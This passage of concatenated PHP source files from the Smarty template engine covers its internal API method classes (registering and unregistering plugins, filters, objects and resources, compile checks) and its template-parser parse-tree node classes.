                    if (is_file($file)) {
                        $this->plugin_files[ 'plugins_dir' ][ $_lower_filename ] = $file;
                        include_once $file;
                        return $file;
                    }
                    $this->plugin_files[ 'plugins_dir' ][ $_lower_filename ] = false;
                }
            }
        }
        if ($smarty->use_include_path) {
            foreach ($_file_names as $_file_name) {
                // try PHP include_path
                $file = $smarty->ext->_getIncludePath->getIncludePath($_p_dirs, $_file_name, $smarty);
                $this->plugin_files[ 'include_path' ][ $_lower_filename ] = $file;
                if ($file !== false) {
                    include_once $file;
                    return $file;
                }
            }
        }
        // no plugin loaded
        return false;
    }
}
<?php

/**
 * Smarty Method MustCompile
 *
 * Smarty_Internal_Template::mustCompile() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_MustCompile
{
    /**
     * Valid for template object
     *
     * @var int
     */
    public $objMap = 2;

    /**
     * Returns if the current template must be compiled by the Smarty compiler
     * It does compare the timestamps of template source and the compiled templates and checks the force compile
     * configuration
     *
     * @param \Smarty_Internal_Template $_template
     *
     * @return bool
     * @throws \SmartyException
     */
    public function mustCompile(Smarty_Internal_Template $_template)
    {
        if (!$_template->source->exists) {
            if ($_template->_isSubTpl()) {
                $parent_resource = " in '{$_template->parent->template_resource}'";
            } else {
                $parent_resource = '';
            }
            throw new SmartyException("Unable to load template {$_template->source->type} '{$_template->source->name}'{$parent_resource}");
        }
        if ($_template->mustCompile === null) {
            $_template->mustCompile = (!$_template->source->handler->uncompiled &&
                                       ($_template->smarty->force_compile || $_template->source->handler->recompiled ||
                                        !$_template->compiled->exists || ($_template->compile_check &&
                                                                          $_template->compiled->getTimeStamp() <
                                                                          $_template->source->getTimeStamp())));
        }
        return $_template->mustCompile;
    }
}
<?php

/**
 * Smarty Method RegisterCacheResource
 *
 * Smarty::registerCacheResource() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_RegisterCacheResource
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Registers a resource to fetch a template
     *
     * @api  Smarty::registerCacheResource()
     * @link https://www.smarty.net/docs/en/api.register.cacheresource.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param string                                                          $name name of resource type
     * @param \Smarty_CacheResource                                           $resource_handler
     *
     * @return \Smarty|\Smarty_Internal_Template
     */
    public function registerCacheResource(
        Smarty_Internal_TemplateBase $obj,
        $name,
        Smarty_CacheResource $resource_handler
    ) {
        $smarty = $obj->_getSmartyObj();
        $smarty->registered_cache_resources[ $name ] = $resource_handler;
        return $obj;
    }
}
<?php

/**
 * Smarty Method RegisterClass
 *
 * Smarty::registerClass() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_RegisterClass
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Registers static classes to be used in templates
     *
     * @api  Smarty::registerClass()
     * @link https://www.smarty.net/docs/en/api.register.class.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param string                                                          $class_name
     * @param string                                                          $class_impl the referenced PHP class to
     *                                                                                    register
     *
     * @return \Smarty|\Smarty_Internal_Template
     * @throws \SmartyException
     */
    public function registerClass(Smarty_Internal_TemplateBase $obj, $class_name, $class_impl)
    {
        $smarty = $obj->_getSmartyObj();
        // test if exists
        if (!class_exists($class_impl)) {
            throw new SmartyException("Undefined class '$class_impl' in register template class");
        }
        // register the class
        $smarty->registered_classes[ $class_name ] = $class_impl;
        return $obj;
    }
}
<?php

/**
 * Smarty Method RegisterDefaultConfigHandler
 *
 * Smarty::registerDefaultConfigHandler() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_RegisterDefaultConfigHandler
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Register config default handler
     *
     * @api Smarty::registerDefaultConfigHandler()
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param callable                                                        $callback class/method name
     *
     * @return \Smarty|\Smarty_Internal_Template
     * @throws SmartyException              if $callback is not callable
     */
    public function registerDefaultConfigHandler(Smarty_Internal_TemplateBase $obj, $callback)
    {
        $smarty = $obj->_getSmartyObj();
        if (is_callable($callback)) {
            $smarty->default_config_handler_func = $callback;
        } else {
            throw new SmartyException('Default config handler not callable');
        }
        return $obj;
    }
}
<?php

/**
 * Smarty Method RegisterDefaultPluginHandler
 *
 * Smarty::registerDefaultPluginHandler() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_RegisterDefaultPluginHandler
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Registers a default plugin handler
     *
     * @api  Smarty::registerDefaultPluginHandler()
     * @link https://www.smarty.net/docs/en/api.register.default.plugin.handler.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param callable                                                        $callback class/method name
     *
     * @return \Smarty|\Smarty_Internal_Template
     * @throws SmartyException              if $callback is not callable
     */
    public function registerDefaultPluginHandler(Smarty_Internal_TemplateBase $obj, $callback)
    {
        $smarty = $obj->_getSmartyObj();
        if (is_callable($callback)) {
            $smarty->default_plugin_handler_func = $callback;
        } else {
            throw new SmartyException("Default plugin handler '$callback' not callable");
        }
        return $obj;
    }
}
<?php

/**
 * Smarty Method RegisterDefaultTemplateHandler
 *
 * Smarty::registerDefaultTemplateHandler() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_RegisterDefaultTemplateHandler
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Register template default handler
     *
     * @api Smarty::registerDefaultTemplateHandler()
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param callable                                                        $callback class/method name
     *
     * @return \Smarty|\Smarty_Internal_Template
     * @throws SmartyException              if $callback is not callable
     */
    public function registerDefaultTemplateHandler(Smarty_Internal_TemplateBase $obj, $callback)
    {
        $smarty = $obj->_getSmartyObj();
        if (is_callable($callback)) {
            $smarty->default_template_handler_func = $callback;
        } else {
            throw new SmartyException('Default template handler not callable');
        }
        return $obj;
    }

    /**
     * get default content from template or config resource handler
     *
     * @param Smarty_Template_Source $source
     *
     * @throws \SmartyException
     */
    public static function _getDefaultTemplate(Smarty_Template_Source $source)
    {
        if ($source->isConfig) {
            $default_handler = $source->smarty->default_config_handler_func;
        } else {
            $default_handler = $source->smarty->default_template_handler_func;
        }
        $_content = $_timestamp = null;
        $_return = call_user_func_array(
            $default_handler,
            array($source->type, $source->name, &$_content, &$_timestamp, $source->smarty)
        );
        if (is_string($_return)) {
            $source->exists = is_file($_return);
            if ($source->exists) {
                $source->timestamp = filemtime($_return);
            } else {
                throw new SmartyException(
                    'Default handler: Unable to load ' .
                    ($source->isConfig ? 'config' : 'template') .
                    " default file '{$_return}' for '{$source->type}:{$source->name}'"
                );
            }
            $source->name = $source->filepath = $_return;
            $source->uid = sha1($source->filepath);
        } elseif ($_return === true) {
            $source->content = $_content;
            $source->exists = true;
            $source->uid = $source->name = sha1($_content);
            $source->handler = Smarty_Resource::load($source->smarty, 'eval');
        } else {
            $source->exists = false;
            throw new SmartyException(
                'Default handler: No ' . ($source->isConfig ? 'config' : 'template') .
                " default content for '{$source->type}:{$source->name}'"
            );
        }
    }
}
<?php

/**
 * Smarty Method RegisterFilter
 *
 * Smarty::registerFilter() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_RegisterFilter
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Valid filter types
     *
     * @var array
     */
    private $filterTypes = array('pre' => true, 'post' => true, 'output' => true, 'variable' => true);

    /**
     * Registers a filter function
     *
     * @api  Smarty::registerFilter()
     *
     * @link https://www.smarty.net/docs/en/api.register.filter.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param string                                                          $type filter type
     * @param callback                                                        $callback
     * @param string|null                                                     $name optional filter name
     *
     * @return \Smarty|\Smarty_Internal_Template
     * @throws \SmartyException
     */
    public function registerFilter(Smarty_Internal_TemplateBase $obj, $type, $callback, $name = null)
    {
        $smarty = $obj->_getSmartyObj();
        $this->_checkFilterType($type);
        $name = isset($name) ? $name : $this->_getFilterName($callback);
        if (!is_callable($callback)) {
            throw new SmartyException("{$type}filter '{$name}' not callable");
        }
        $smarty->registered_filters[ $type ][ $name ] = $callback;
        return $obj;
    }

    /**
     * Return internal filter name
     *
     * @param callback $function_name
     *
     * @return string   internal filter name
     */
    public function _getFilterName($function_name)
    {
        if (is_array($function_name)) {
            $_class_name = (is_object($function_name[ 0 ]) ? get_class($function_name[ 0 ]) : $function_name[ 0 ]);
            return $_class_name . '_' . $function_name[ 1 ];
        } elseif (is_string($function_name)) {
            return $function_name;
        } else {
            return 'closure';
        }
    }

    /**
     * Check if filter type is valid
     *
     * @param string $type
     *
     * @throws \SmartyException
     */
    public function _checkFilterType($type)
    {
        if (!isset($this->filterTypes[ $type ])) {
            throw new SmartyException("Illegal filter type '{$type}'");
        }
    }
}
<?php

/**
 * Smarty Method RegisterObject
 *
 * Smarty::registerObject() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_RegisterObject
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Registers object to be used in templates
     *
     * @api  Smarty::registerObject()
     * @link https://www.smarty.net/docs/en/api.register.object.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param string                                                          $object_name
     * @param object                                                          $object                     the
     *                                                                                                    referenced
     *                                                                                                    PHP
     *                                                                                                    object
     *                                                                                                    to
     *                                                                                                    register
     *
     * @param array                                                           $allowed_methods_properties list of
     *                                                                                                    allowed
     *                                                                                                    methods
     *                                                                                                    (empty
     *                                                                                                    = all)
     *
     * @param bool                                                            $format                     smarty
     *                                                                                                    argument
     *                                                                                                    format,
     *                                                                                                    else
     *                                                                                                    traditional
     *
     * @param array                                                           $block_methods              list of
     *                                                                                                    block-methods
     *
     * @return \Smarty|\Smarty_Internal_Template
     * @throws \SmartyException
     */
    public function registerObject(
        Smarty_Internal_TemplateBase $obj,
        $object_name,
        $object,
        $allowed_methods_properties = array(),
        $format = true,
        $block_methods = array()
    ) {
        $smarty = $obj->_getSmartyObj();
        // test if allowed methods callable
        if (!empty($allowed_methods_properties)) {
            foreach ((array)$allowed_methods_properties as $method) {
                if (!is_callable(array($object, $method)) && !property_exists($object, $method)) {
                    throw new SmartyException("Undefined method or property '$method' in registered object");
                }
            }
        }
        // test if block methods callable
        if (!empty($block_methods)) {
            foreach ((array)$block_methods as $method) {
                if (!is_callable(array($object, $method))) {
                    throw new SmartyException("Undefined method '$method' in registered object");
                }
            }
        }
        // register the object
        $smarty->registered_objects[ $object_name ] =
            array($object, (array)$allowed_methods_properties, (boolean)$format, (array)$block_methods);
        return $obj;
    }
}
<?php

/**
 * Smarty Method RegisterPlugin
 *
 * Smarty::registerPlugin() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_RegisterPlugin
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Registers plugin to be used in templates
     *
     * @api  Smarty::registerPlugin()
     * @link https://www.smarty.net/docs/en/api.register.plugin.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param string                                                          $type       plugin type
     * @param string                                                          $name       name of template tag
     * @param callback                                                        $callback   PHP callback to register
     * @param bool                                                            $cacheable  if true (default) this
     *                                                                                    function is cache able
     * @param mixed                                                           $cache_attr caching attributes if any
     *
     * @return \Smarty|\Smarty_Internal_Template
     * @throws SmartyException              when the plugin tag is invalid
     */
    public function registerPlugin(
        Smarty_Internal_TemplateBase $obj,
        $type,
        $name,
        $callback,
        $cacheable = true,
        $cache_attr = null
    ) {
        $smarty = $obj->_getSmartyObj();
        if (isset($smarty->registered_plugins[ $type ][ $name ])) {
            throw new SmartyException("Plugin tag '{$name}' already registered");
        } elseif (!is_callable($callback)) {
            throw new SmartyException("Plugin '{$name}' not callable");
        } elseif ($cacheable && $cache_attr) {
            throw new SmartyException("Cannot set caching attributes for plugin '{$name}' when it is cacheable.");
        } else {
            $smarty->registered_plugins[ $type ][ $name ] = array($callback, (bool)$cacheable, (array)$cache_attr);
        }
        return $obj;
    }
}
<?php

/**
 * Smarty Method RegisterResource
 *
 * Smarty::registerResource() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_RegisterResource
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Registers a resource to fetch a template
     *
     * @api  Smarty::registerResource()
     * @link https://www.smarty.net/docs/en/api.register.resource.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param string                                                          $name             name of resource type
     * @param Smarty_Resource                                           $resource_handler instance of Smarty_Resource
     *
     * @return \Smarty|\Smarty_Internal_Template
     */
    public function registerResource(Smarty_Internal_TemplateBase $obj, $name, Smarty_Resource $resource_handler)
    {
        $smarty = $obj->_getSmartyObj();
        $smarty->registered_resources[ $name ] = $resource_handler;
        return $obj;
    }
}
<?php

/**
 * Smarty Method SetAutoloadFilters
 *
 * Smarty::setAutoloadFilters() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_SetAutoloadFilters
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Valid filter types
     *
     * @var array
     */
    private $filterTypes = array('pre' => true, 'post' => true, 'output' => true, 'variable' => true);

    /**
     * Set autoload filters
     *
     * @api Smarty::setAutoloadFilters()
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param array                                                           $filters filters to load automatically
     * @param string                                                          $type    "pre", "output", … specify
     *                                                                                 the filter type to set.
     *                                                                                 Defaults to none treating
     *                                                                                 $filters' keys as the
     *                                                                                 appropriate types
     *
     * @return \Smarty|\Smarty_Internal_Template
     * @throws \SmartyException
     */
    public function setAutoloadFilters(Smarty_Internal_TemplateBase $obj, $filters, $type = null)
    {
        $smarty = $obj->_getSmartyObj();
        if ($type !== null) {
            $this->_checkFilterType($type);
            $smarty->autoload_filters[ $type ] = (array)$filters;
        } else {
            foreach ((array)$filters as $type => $value) {
                $this->_checkFilterType($type);
            }
            $smarty->autoload_filters = (array)$filters;
        }
        return $obj;
    }

    /**
     * Check if filter type is valid
     *
     * @param string $type
     *
     * @throws \SmartyException
     */
    public function _checkFilterType($type)
    {
        if (!isset($this->filterTypes[ $type ])) {
            throw new SmartyException("Illegal filter type '{$type}'");
        }
    }
}
<?php

/**
 * Smarty Method SetDebugTemplate
 *
 * Smarty::setDebugTemplate() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_SetDebugTemplate
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * set the debug template
     *
     * @api Smarty::setDebugTemplate()
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param string                                                          $tpl_name
     *
     * @return \Smarty|\Smarty_Internal_Template
     * @throws SmartyException if file is not readable
     */
    public function setDebugTemplate(Smarty_Internal_TemplateBase $obj, $tpl_name)
    {
        $smarty = $obj->_getSmartyObj();
        if (!is_readable($tpl_name)) {
            throw new SmartyException("Unknown file '{$tpl_name}'");
        }
        $smarty->debug_tpl = $tpl_name;
        return $obj;
    }
}
<?php

/**
 * Smarty Method SetDefaultModifiers
 *
 * Smarty::setDefaultModifiers() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_SetDefaultModifiers
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Set default modifiers
     *
     * @api Smarty::setDefaultModifiers()
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param array|string                                                    $modifiers modifier or list of modifiers
     *                                                                                   to set
     *
     * @return \Smarty|\Smarty_Internal_Template
     */
    public function setDefaultModifiers(Smarty_Internal_TemplateBase $obj, $modifiers)
    {
        $smarty = $obj->_getSmartyObj();
        $smarty->default_modifiers = (array)$modifiers;
        return $obj;
    }
}
<?php

/**
 * Smarty Method UnloadFilter
 *
 * Smarty::unloadFilter() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_UnloadFilter extends Smarty_Internal_Method_LoadFilter
{
    /**
     * load a filter of specified type and name
     *
     * @api  Smarty::unloadFilter()
     *
     * @link https://www.smarty.net/docs/en/api.unload.filter.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param string                                                          $type filter type
     * @param string                                                          $name filter name
     *
     * @return Smarty_Internal_TemplateBase
     * @throws \SmartyException
     */
    public function unloadFilter(Smarty_Internal_TemplateBase $obj, $type, $name)
    {
        $smarty = $obj->_getSmartyObj();
        $this->_checkFilterType($type);
        if (isset($smarty->registered_filters[ $type ])) {
            $_filter_name = "smarty_{$type}filter_{$name}";
            if (isset($smarty->registered_filters[ $type ][ $_filter_name ])) {
                unset($smarty->registered_filters[ $type ][ $_filter_name ]);
                if (empty($smarty->registered_filters[ $type ])) {
                    unset($smarty->registered_filters[ $type ]);
                }
            }
        }
        return $obj;
    }
}
<?php

/**
 * Smarty Method UnregisterCacheResource
 *
 * Smarty::unregisterCacheResource() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_UnregisterCacheResource
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Registers a resource to fetch a template
     *
     * @api  Smarty::unregisterCacheResource()
     * @link https://www.smarty.net/docs/en/api.unregister.cacheresource.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param                                                                 $name
     *
     * @return \Smarty|\Smarty_Internal_Template
     */
    public function unregisterCacheResource(Smarty_Internal_TemplateBase $obj, $name)
    {
        $smarty = $obj->_getSmartyObj();
        if (isset($smarty->registered_cache_resources[ $name ])) {
            unset($smarty->registered_cache_resources[ $name ]);
        }
        return $obj;
    }
}
<?php

/**
 * Smarty Method UnregisterFilter
 *
 * Smarty::unregisterFilter() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_UnregisterFilter extends Smarty_Internal_Method_RegisterFilter
{
    /**
     * Unregisters a filter function
     *
     * @api  Smarty::unregisterFilter()
     *
     * @link https://www.smarty.net/docs/en/api.unregister.filter.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param string                                                          $type filter type
     * @param callback|string                                                 $callback
     *
     * @return \Smarty|\Smarty_Internal_Template
     * @throws \SmartyException
     */
    public function unregisterFilter(Smarty_Internal_TemplateBase $obj, $type, $callback)
    {
        $smarty = $obj->_getSmartyObj();
        $this->_checkFilterType($type);
        if (isset($smarty->registered_filters[ $type ])) {
            $name = is_string($callback) ? $callback : $this->_getFilterName($callback);
            if (isset($smarty->registered_filters[ $type ][ $name ])) {
                unset($smarty->registered_filters[ $type ][ $name ]);
                if (empty($smarty->registered_filters[ $type ])) {
                    unset($smarty->registered_filters[ $type ]);
                }
            }
        }
        return $obj;
    }
}
<?php

/**
 * Smarty Method UnregisterObject
 *
 * Smarty::unregisterObject() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_UnregisterObject
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Registers plugin to be used in templates
     *
     * @api  Smarty::unregisterObject()
     * @link https://www.smarty.net/docs/en/api.unregister.object.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param string                                                          $object_name name of object
     *
     * @return \Smarty|\Smarty_Internal_Template
     */
    public function unregisterObject(Smarty_Internal_TemplateBase $obj, $object_name)
    {
        $smarty = $obj->_getSmartyObj();
        if (isset($smarty->registered_objects[ $object_name ])) {
            unset($smarty->registered_objects[ $object_name ]);
        }
        return $obj;
    }
}
<?php

/**
 * Smarty Method UnregisterPlugin
 *
 * Smarty::unregisterPlugin() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_UnregisterPlugin
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Registers plugin to be used in templates
     *
     * @api  Smarty::unregisterPlugin()
     * @link https://www.smarty.net/docs/en/api.unregister.plugin.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param string                                                          $type plugin type
     * @param string                                                          $name name of template tag
     *
     * @return \Smarty|\Smarty_Internal_Template
     */
    public function unregisterPlugin(Smarty_Internal_TemplateBase $obj, $type, $name)
    {
        $smarty = $obj->_getSmartyObj();
        if (isset($smarty->registered_plugins[ $type ][ $name ])) {
            unset($smarty->registered_plugins[ $type ][ $name ]);
        }
        return $obj;
    }
}
<?php

/**
 * Smarty Method UnregisterResource
 *
 * Smarty::unregisterResource() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_UnregisterResource
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Registers a resource to fetch a template
     *
     * @api  Smarty::unregisterResource()
     * @link https://www.smarty.net/docs/en/api.unregister.resource.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param string                                                          $type name of resource type
     *
     * @return \Smarty|\Smarty_Internal_Template
     */
    public function unregisterResource(Smarty_Internal_TemplateBase $obj, $type)
    {
        $smarty = $obj->_getSmartyObj();
        if (isset($smarty->registered_resources[ $type ])) {
            unset($smarty->registered_resources[ $type ]);
        }
        return $obj;
    }
}
<?php
/**
 * Smarty Internal Plugin Nocache Insert
 * Compiles the {insert} tag into the cache file
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Insert Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Nocache_Insert
{
    /**
     * Compiles code for the {insert} tag into cache file
     *
     * @param string                   $_function insert function name
     * @param array                    $_attr     array with parameter
     * @param Smarty_Internal_Template $_template template object
     * @param string                   $_script   script name to load or 'null'
     * @param string                   $_assign   optional variable name
     *
     * @return string                   compiled code
     */
    public static function compile($_function, $_attr, $_template, $_script, $_assign = null)
    {
        $_output = '<?php ';
        if ($_script !== 'null') {
            // script which must be included
            // code for script file loading
            $_output .= "require_once '{$_script}';";
        }
        // call insert
        if (isset($_assign)) {
            $_output .= "\$_smarty_tpl->assign('{$_assign}' , {$_function} (" . var_export($_attr, true) .
                        ',\$_smarty_tpl), true);?>';
        } else {
            $_output .= "echo {$_function}(" . var_export($_attr, true) . ',$_smarty_tpl);?>';
        }
        $_tpl = $_template;
        while ($_tpl->_isSubTpl()) {
            $_tpl = $_tpl->parent;
        }
        return "/*%%SmartyNocache:{$_tpl->compiled->nocache_hash}%%*/{$_output}/*/%%SmartyNocache:{$_tpl->compiled->nocache_hash}%%*/";
    }
}
<?php
/**
 * Smarty Internal Plugin Templateparser Parsetree
 * These are classes to build parsetree in the template parser
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Thue Kristensen
 * @author     Uwe Tews
 */

/**
 * @package    Smarty
 * @subpackage Compiler
 * @ignore
 */
abstract class Smarty_Internal_ParseTree
{
    /**
     * Buffer content
     *
     * @var mixed
     */
    public $data;

    /**
     * Subtree array
     *
     * @var array
     */
    public $subtrees = array();

    /**
     * Return buffer
     *
     * @param \Smarty_Internal_Templateparser $parser
     *
     * @return string buffer content
     */
    abstract public function to_smarty_php(Smarty_Internal_Templateparser $parser);

    /**
     * Template data object destructor
     */
    public function __destruct()
    {
        $this->data = null;
        $this->subtrees = null;
    }
}
<?php
/**
 * Smarty Internal Plugin Templateparser Parse Tree
 * These are classes to build parse trees in the template parser
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Thue Kristensen
 * @author     Uwe Tews
 */

/**
 * Code fragment inside a tag .
 *
 * @package    Smarty
 * @subpackage Compiler
 * @ignore
 */
class Smarty_Internal_ParseTree_Code extends Smarty_Internal_ParseTree
{
    /**
     * Create parse tree buffer for code fragment
     *
     * @param string $data content
     */
    public function __construct($data)
    {
        $this->data = $data;
    }

    /**
     * Return buffer content in parentheses
     *
     * @param \Smarty_Internal_Templateparser $parser
     *
     * @return string content
     */
    public function to_smarty_php(Smarty_Internal_Templateparser $parser)
    {
        return sprintf('(%s)', $this->data);
    }
}
<?php
/**
 * Double quoted string inside a tag.
 *
 * @package    Smarty
 * @subpackage Compiler
 * @ignore
 */

/**
 * Double quoted string inside a tag.
 *
 * @package    Smarty
 * @subpackage Compiler
 * @ignore
 */
class Smarty_Internal_ParseTree_Dq extends Smarty_Internal_ParseTree
{
    /**
     * Create parse tree buffer for double quoted string subtrees
     *
     * @param object                    $parser  parser object
     * @param Smarty_Internal_ParseTree $subtree parse tree buffer
     */
    public function __construct($parser, Smarty_Internal_ParseTree $subtree)
    {
        $this->subtrees[] = $subtree;
        if ($subtree instanceof Smarty_Internal_ParseTree_Tag) {
            $parser->block_nesting_level = count($parser->compiler->_tag_stack);
        }
    }

    /**
     * Append buffer to subtree
     *
     * @param \Smarty_Internal_Templateparser $parser
     * @param Smarty_Internal_ParseTree       $subtree parse tree buffer
     */
    public function append_subtree(Smarty_Internal_Templateparser $parser, Smarty_Internal_ParseTree $subtree)
    {
        $last_subtree = count($this->subtrees) - 1;
        if ($last_subtree >= 0 && $this->subtrees[ $last_subtree ] instanceof Smarty_Internal_ParseTree_Tag
            && $this->subtrees[ $last_subtree ]->saved_block_nesting < $parser->block_nesting_level
        ) {
            if ($subtree instanceof Smarty_Internal_ParseTree_Code) {
                $this->subtrees[ $last_subtree ]->data =
                    $parser->compiler->appendCode(
                        $this->subtrees[ $last_subtree ]->data,
                        '<?php echo ' . $subtree->data . ';?>'
                    );
            } elseif ($subtree instanceof Smarty_Internal_ParseTree_DqContent) {
                $this->subtrees[ $last_subtree ]->data =
                    $parser->compiler->appendCode(
                        $this->subtrees[ $last_subtree ]->data,
                        '<?php echo "' . $subtree->data . '";?>'
                    );
            } else {
                $this->subtrees[ $last_subtree ]->data =
                    $parser->compiler->appendCode($this->subtrees[ $last_subtree ]->data, $subtree->data);
            }
        } else {
            $this->subtrees[] = $subtree;
        }
        if ($subtree instanceof Smarty_Internal_ParseTree_Tag) {
            $parser->block_nesting_level = count($parser->compiler->_tag_stack);
        }
    }

    /**
     * Merge subtree buffer content together
     *
     * @param \Smarty_Internal_Templateparser $parser
     *
     * @return string compiled template code
     */
    public function to_smarty_php(Smarty_Internal_Templateparser $parser)
    {
        $code = '';
        foreach ($this->subtrees as $subtree) {
            if ($code !== '') {
                $code .= '.';
            }
            if ($subtree instanceof Smarty_Internal_ParseTree_Tag) {
                $more_php = $subtree->assign_to_var($parser);
            } else {
                $more_php = $subtree->to_smarty_php($parser);
            }
            $code .= $more_php;
            if (!$subtree instanceof Smarty_Internal_ParseTree_DqContent) {
                $parser->compiler->has_variable_string = true;
            }
        }
        return $code;
    }
}
<?php
/**
 * Smarty Internal Plugin Templateparser Parse Tree
 * These are classes to build parse tree  in the template parser
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Thue Kristensen
 * @author     Uwe Tews
 */

/**
 * Raw chars as part of a double quoted string.
 *
 * @package    Smarty
 * @subpackage Compiler
 * @ignore
 */
class Smarty_Internal_ParseTree_DqContent extends Smarty_Internal_ParseTree
{
    /**
     * Create parse tree buffer with string content
     *
     * @param string $data string section
     */
    public function __construct($data)
    {
        $this->data = $data;
    }

    /**
     * Return content as double quoted string
     *
     * @param \Smarty_Internal_Templateparser $parser
     *
     * @return string doubled quoted string
     */
    public function to_smarty_php(Smarty_Internal_Templateparser $parser)
    {
        return '"' . $this->data . '"';
    }
}
<?php
/**
 * Smarty Internal Plugin Templateparser Parse Tree
 * These are classes to build parse tree in the template parser
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Thue Kristensen
 * @author     Uwe Tews
 */

/**
 * A complete smarty tag.
 *
 * @package    Smarty
 * @subpackage Compiler
 * @ignore
 */
class Smarty_Internal_ParseTree_Tag extends Smarty_Internal_ParseTree
{
    /**
     * Saved block nesting level
     *
     * @var int
     */
    public $saved_block_nesting;

    /**
     * Create parse tree buffer for Smarty tag
     *
     * @param \Smarty_Internal_Templateparser $parser parser object
     * @param string                          $data   content
     */
    public function __construct(Smarty_Internal_Templateparser $parser, $data)
    {
        $this->data = $data;
        $this->saved_block_nesting = $parser->block_nesting_level;
